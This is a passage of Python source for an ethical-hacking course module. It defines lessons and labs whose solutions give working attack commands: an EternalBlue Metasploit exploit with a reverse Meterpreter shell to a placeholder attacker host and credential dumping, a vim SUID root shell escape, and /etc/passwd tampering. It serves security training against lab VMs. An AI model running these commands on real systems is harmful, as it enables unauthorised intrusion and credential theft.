 reporting. Legal frameworks: contracts, scope definition, rules of engagement, and responsible disclosure.",
                lesson_type=LessonType.TEXT, duration_min=45, order=1,
            ),
            SecurityLesson(
                id="ethhack_l2", module_id="ethhack_001", title="Passive Reconnaissance",
                content="Open-source intelligence (OSINT) gathering without touching target systems. Tools: theHarvester, Shodan, Maltego, recon-ng, OSINT Framework. Techniques: WHOIS, DNS enumeration, Google dorking, social media analysis, metadata extraction, dark web monitoring.",
                lesson_type=LessonType.INTERACTIVE, duration_min=55, order=2,
            ),
            SecurityLesson(
                id="ethhack_l3", module_id="ethhack_001", title="Active Scanning & Enumeration",
                content="Nmap advanced scanning, Masscan for internet-scale scanning, unicornscan, and zmap. Service enumeration with banner grabbing, SNMP enumeration, LDAP probing, SMB enumeration. Vulnerability scanning with Nessus, OpenVAS, and Nikto.",
                lesson_type=LessonType.INTERACTIVE, duration_min=60, order=3,
            ),
            SecurityLesson(
                id="ethhack_l4", module_id="ethhack_001", title="Exploitation with Metasploit",
                content="Metasploit Framework: msfconsole, module types (exploits, payloads, auxiliaries, encoders), database integration. Exploit selection, payload configuration (staged vs stageless), handler setup, and post-exploitation modules. Writing custom Metasploit modules.",
                lesson_type=LessonType.INTERACTIVE, duration_min=70, order=4,
            ),
            SecurityLesson(
                id="ethhack_l5", module_id="ethhack_001", title="Post-Exploitation Techniques",
                content="Maintaining access: persistence mechanisms, backdoors, web shells. Privilege escalation: kernel exploits, sudo misconfigurations, SUID binaries, service exploits. Data exfiltration techniques. Lateral movement: Pass-the-Hash, Kerberoasting, and pivoting through compromised hosts.",
                lesson_type=LessonType.VIDEO, duration_min=60, order=5,
            ),
            SecurityLesson(
                id="ethhack_l6", module_id="ethhack_001", title="Privilege Escalation",
                content="Linux privilege escalation: SUID/GUID files, cron jobs, kernel exploits, PATH manipulation, LD_PRELOAD, sudo misconfigurations. Windows privilege escalation: token impersonation, service misconfigurations, unquoted service paths, AlwaysInstallElevated, UAC bypass techniques.",
                lesson_type=LessonType.INTERACTIVE, duration_min=65, order=6,
            ),
            SecurityLesson(
                id="ethhack_l7", module_id="ethhack_001", title="Reporting & CVSS Scoring",
                content="Professional penetration test reporting: executive summary, technical findings, risk ratings, remediation guidance. CVSS v3.1 scoring: Base (AV, AC, PR, UI, S, C, I, A), Temporal, and Environmental metrics. Report templates and presentation to stakeholders.",
                lesson_type=LessonType.TEXT, duration_min=50, order=7,
            ),
        ],
        labs=[
            SecurityLab(
                id="ethhack_lab1", module_id="ethhack_001",
                title="OSINT Reconnaissance Challenge",
                description="Gather intelligence on a target organization using only passive techniques.",
                environment="Kali Linux with theHarvester, recon-ng, Shodan CLI, Maltego CE.",
                tasks=[
                    "Find all subdomains using passive DNS techniques",
                    "Harvest email addresses and employee names",
                    "Identify technology stack from Shodan and Wappalyzer",
                    "Find exposed documents with metadata on Google",
                    "Map social media presence and employee connections",
                    "Document all findings in OSINT report format",
                ],
                hints=[
                    "Use site:target.com -www to find subdomains",
                    "theHarvester -d target.com -b all",
                    "Check Shodan for open ports and services",
                ],
                solution="theHarvester -d example.com -b google,linkedin,shodan; recon-ng use recon/domains-hosts/google_site_web; shodan host target_ip; site:example.com filetype:pdf for documents",
                duration_min=60, points=125,
            ),
            SecurityLab(
                id="ethhack_lab2", module_id="ethhack_001",
                title="Metasploit Exploitation Lab",
                description="Exploit a vulnerable service and establish a Meterpreter session on a target system.",
                environment="Kali Linux with Metasploit 6.x, vulnerable Metasploitable3 VM, isolated network.",
                tasks=[
                    "Scan target with Nmap and identify vulnerable services",
                    "Search Metasploit for matching exploits",
                    "Configure exploit with RHOSTS, LHOST, and payload",
                    "Launch exploit and gain shell access",
                    "Upgrade to Meterpreter session",
                    "Run post-exploitation modules (hashdump, privesc check)",
                ],
                hints=[
                    "search type:exploit name:service_version",
                    "show options to see required settings",
                    "sessions -l to list active sessions",
                ],
                solution="nmap -sV target; msfconsole; search eternalromance; use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS target_ip; set LHOST attacker_ip; set payload windows/x64/meterpreter/reverse_tcp; exploit; hashdump; getsystem",
                duration_min=90, points=175,
            ),
            SecurityLab(
                id="ethhack_lab3", module_id="ethhack_001",
                title="Linux Privilege Escalation",
                description="Gain root access on a Linux system through multiple privilege escalation vectors.",
                environment="Ubuntu 20.04 VM with intentional misconfigurations, LinPEAS, GTFOBins reference.",
                tasks=[
                    "Run LinPEAS to identify privilege escalation vectors",
                    "Exploit SUID binary misconfiguration",
                    "Escalate via writable /etc/passwd",
                    "Exploit sudo misconfiguration (NOPASSWD)",
                    "Escalate via cron job with writable script",
                    "Document each vector with CVSS scoring",
                ],
                hints=[
                    "find / -perm -4000 2>/dev/null for SUID files",
                    "sudo -l to list allowed sudo commands",
                    "Check crontab -l and /etc/crontab",
                ],
                solution="""find / -perm -4000 2>/dev/null; # exploit vim SUID: ./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh")'; # sudo -l shows NOPASSWD: ALL; sudo su; # writable passwd: openssl passwd -1 newpassword; edit /etc/passwd newroot entry""",
                duration_min=75, points=150,
            ),
            SecurityLab(
                id="ethhack_lab4", module_id="ethhack_001",
                title="Professional Pentest Report Writing",
                description="Create a professional penetration test report based on discovered vulnerabilities.",
                environment="Sample pentest data, CVSS v3.1 calculator, report template, Dradis framework.",
                tasks=[
                    "Organize findings by severity (Critical, High, Medium, Low)",
                    "Calculate CVSS v3.1 scores for each finding",
                    "Write executive summary for C-level audience",
                    "Document each finding with evidence screenshots",
                    "Provide specific, actionable remediation steps",
                    "In